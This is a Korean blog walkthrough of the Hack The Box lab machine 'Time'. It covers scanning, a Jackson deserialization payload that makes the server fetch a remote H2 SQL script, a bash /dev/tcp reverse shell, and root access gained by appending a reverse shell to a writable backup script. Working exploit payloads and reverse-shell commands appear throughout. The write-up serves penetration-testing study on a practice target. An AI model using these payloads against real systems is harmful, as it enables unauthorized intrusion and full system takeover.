[접속 방법]
풀어볼 리스트에 있는 박스 중 하나인
[Time]이 공짜 리스트에 있다.
클릭하면 IP를 받을 수 있고
해당 IP에 핑을 날려
접속 가능 여부를 확인
┌──(root💀takudaddy)-[~]
└─# ping 10.10.10.214 1 ⚙
PING 10.10.10.214 (10.10.10.214) 56(84) bytes of data.
64 bytes from 10.10.10.214: icmp_seq=1 ttl=63 time=263 ms
64 bytes from 10.10.10.214: icmp_seq=2 ttl=63 time=263 ms
64 bytes from 10.10.10.214: icmp_seq=3 ttl=63 time=264 ms
^C
--- 10.10.10.214 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 262.564/263.183/263.675/0.462 ms
시작해 보자.
Table of Contents
1. SCANNING
2. EXPLOITATION
3. POST EXPLOITATION
4. PRIVILEGE ESCALATION
1. SCANNING
┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.214 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 18:30 KST
Nmap scan report for 10.10.10.214
Host is up (0.26s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
| 256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_ 256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/16%OT=22%CT=1%CU=39040%PV=Y%DS=2%DC=T%G=Y%TM=60795A8
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 263.31 ms 10.10.14.1
2 263.51 ms 10.10.10.214
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
Json 포멧으로 입력해보면
출력된다.
validate
힌트는 에러 문구이고
validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'takudaddy': was expecting 'null', 'true', 'false' or NaN
jackson.core 관련 정보를 구글링해
공격 방법을 찾는다.
2. EXPLOITATION
https://blog.doyensec.com/page6/
위 페이지에 사용 가능한 payloads가 있는데
이를 활용해 간단한 실험을 해본다.
1. 사용할 공격 구문
┌──(root💀takudaddy)-[/attack]
└─# echo "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.6:8000/inject.sql'\"}]"
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.6:8000/inject.sql'"}]
2. 리스너 기동
┌──(root💀takudaddy)-[/attack]
└─# nc -lvnp 8000 1 ⚙
listening on [any] 8000 ...
리스너를 기동하고
echo로 출력한 구문을 페이지에 넣으면
inject.sql 파일이 없기 때문에 fail이 나오지만
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.214] 57556
GET /inject.sql HTTP/1.1
User-Agent: Java/11.0.8
Host: 10.10.14.6:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
연결이 되는 것을 확인했다.
같은 페이지에서 찾은 payloads를 조금 수정해
┌──(root💀takudaddy)-[/htb/time]
└─# cat payloads.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('ping -c 2 10.10.14.6')
파일을 /var/www/html 로 카피.
python으로 웹 서버를 띄워 놓고
┌──(root💀takudaddy)-[/htb/time]
└─# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
tcpdump로 패킷을 확인,
┌──(root💀takudaddy)-[~]
└─# tcpdump -i tun0 icmp 1 ⚙
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
다시 한 번 아래 명령어를 웹에 올리면
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.6:8000/inject.sql'"}]
┌──(root💀takudaddy)-[~]
└─# tcpdump -i tun0 icmp 1 ⚙
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:46:51.913130 IP time > 10.10.14.6: ICMP echo request, id 1, seq 1, length 64
20:46:51.913143 IP 10.10.14.6 > time: ICMP echo reply, id 1, seq 1, length 64
20:46:52.913831 IP time > 10.10.14.6: ICMP echo request, id 1, seq 2, length 64
20:46:52.913845 IP 10.10.14.6 > time: ICMP echo reply, id 1, seq 2, length 64
정상적으로 ping 요청 패킷이 잡힌다.
이제 payloads에
리버스 쉘을 띄우는 구문을 넣어
다시 한 번 실행해 본다.
┌──(root💀takudaddy)-[/var/www/html]
└─# cat inject.sql 1 ⚙
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.6/7979 0>&1')
파이썬 웹 서버는 유지한 채
별도의 리스너를 기동해 주고
┌──(root💀takudaddy)-[/htb/time]
└─# nc -lvnp 7979 1 ⨯
listening on [any] 7979 ...
다시 한 번 공격 구문을 넣어주면
┌──(root💀takudaddy)-[/var/www/html]
└─# python3 -m http.server 1 ⚙
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.214 - - [16/Apr/2021 20:56:39] "GET /inject.sql HTTP/1.1" 200 -
┌──(root💀takudaddy)-[/htb/time]
└─# nc -lvnp 7979 1 ⨯
listening on [any] 7979 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.214] 36434
bash: cannot set terminal process group (890): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$
침투 성공
3. POST EXPLOITATION
pericles@time:/var/www/html$ cd /home
lcd /home
uname -a
Linux time 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
pericles@time:/snap$ sudo --version
sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
pericles@time:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Oct 2 2020 .
drwxr-xr-x 20 root root 4096 Apr 16 12:14 ..
drwxr-xr-x 7 pericles pericles 4096 Oct 23 09:45 pericles
pericles@time:/home$ cd pericles
cd pericles
pericles@time:/home/pericles$ ls -al
ls -al
total 44
drwxr-xr-x 7 pericles pericles 4096 Oct 23 09:45 .
drwxr-xr-x 3 root root 4096 Oct 2 2020 ..
lrwxrwxrwx 1 root root 9 Oct 1 2020 .bash_history -> /dev/null
-rw-r--r-- 1 pericles pericles 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 pericles pericles 3771 Feb 25 2020 .bashrc
drwx------ 2 pericles pericles 4096 Sep 20 2020 .cache
drwx------ 3 pericles pericles 4096 Oct 22 17:45 .config
drwx------ 2 pericles pericles 4096 Oct 23 06:53 .gnupg
lrwxrwxrwx 1 root root 9 Oct 1 2020 .lhistory -> /dev/null
drwxrwxr-x 3 pericles pericles 4096 Sep 29 2020 .local
-rw-r--r-- 1 pericles pericles 807 Feb 25 2020 .profile
drwxr-xr-x 3 pericles pericles 4096 Oct 2 2020 snap
-r-------- 1 pericles pericles 33 Apr 16 04:19 user.txt
pericles@time:/home/pericles$ cat user.txt
cat user.txt
5ca8191ba2349b4a038b47f79bf2c045
pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ cat config.yml
cat config.yml
default-remote: local
remotes:
images:
addr: https://images.linuxcontainers.org
protocol: simplestreams
public: true
local:
addr: unix://
public: false
aliases: {}
pericles@time:/home$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 22840 Aug 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 473576 May 29 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 130152 Jul 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 51344 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 85064 Apr 16 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 55528 Apr 2 2020 /usr/bin/mount
-rwsr-xr-x 1 root root 166056 Jan 19 14:21 /usr/bin/sudo
-rwsr-xr-x 1 root root 67816 Apr 2 2020 /usr/bin/su
-rwsr-xr-x 1 root root 88464 Apr 16 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Apr 2 2020 /usr/bin/umount
-rwsr-xr-x 1 root root 53040 Apr 16 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 68208 Apr 16 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 44784 Apr 16 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 110792 Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 110792 Sep 30 2020 /snap/snapd/9607/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Jan 8 2020 /snap/core18/1705/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1705/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1705/bin/su
-rwsr-xr-x 1 root root 26696 Jan 8 2020 /snap/core18/1705/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1705/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1705/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1705/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1705/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1705/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1705/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1705/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /snap/core18/1885/bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /snap/core18/1885/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1885/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1885/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1885/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /snap/core18/1885/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
pericles@time:/snap$ ls -al
ls -al
total 28
drwxr-xr-x 6 root root 4096 Sep 20 2020 .
drwxr-xr-x 20 root root 4096 Apr 16 12:28 ..
-r--r--r-- 1 root root 548 Sep 20 2020 README
drwxr-xr-x 2 root root 4096 Oct 22 08:14 bin
drwxr-xr-x 4 root root 4096 Sep 21 2020 core18
drwxr-xr-x 4 root root 4096 Oct 22 08:14 lxd
drwxr-xr-x 4 root root 4096 Oct 22 08:14 snapd
pericles@time:/snap$ cat README
cat README
This directory presents installed snap packages.
It has the following structure:
/snap/bin - Symlinks to snap applications.
/snap/<snapname>/<revision> - Mountpoint for snap content.
/snap/<snapname>/current - Symlink to current revision, if enabled.
DISK SPACE USAGE
The disk space consumed by the content under this directory is
minimal as the real snap content never leaves the .snap file.
Snaps are *mounted* rather than unpacked.
For further details please visit
https://forum.snapcraft.io/t/the-snap-directory/2817
pericles@time:/snap$
pericles@time:/snap$ find /usr/bin -writable -type f 2>/dev/null
find /usr/bin -writable -type f 2>/dev/null
/usr/bin/timer_backup.sh
pericles@time:/home/pericles$ ls -l /usr/bin/timer_backup.sh
ls -l /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Apr 16 12:50 /usr/bin/timer_backup.sh
pericles@time:/home/pericles$ cat /usr/bin/timer_backup.sh
cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
4. PRIVILEGE ESCALATION
pericles@time:/var/www/html$ cd /usr/bin
cd /usr/bin
pericles@time:/usr/bin$ cat timer_backup.sh
cat timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/usr/bin$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.6/8989 0>&1"' >>timer_backup.sh
<& /dev/tcp/10.10.14.6/8989 0>&1"' >>timer_backup.sh
┌──(root💀takudaddy)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.214] 47804
bash: cannot set terminal process group (100714): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# cd /root
cd /root
root@time:/root# ls
ls
backup.zip
root.txt
snap
timer_backup.sh
root@time:/root# cat root.txt
cat root.txt
527fbf05ab7c9795032693e1712cd19c
root@time:/root# exit
끝
728x90
'OSCP > HacktheBox' 카테고리의 다른 글
| 3. Popcorn (0) | 2021.04.18 |
|---|---|
| 2. Lame (0) | 2021.04.17 |
| Hack The Box VPN 및 박스 사용법 (2) | 2021.04.16 |
| OSCP 시험과 비슷한 Box 리스트 (0) | 2021.04.16 |
| 1. 회원 가입 (0) | 2021.03.01 |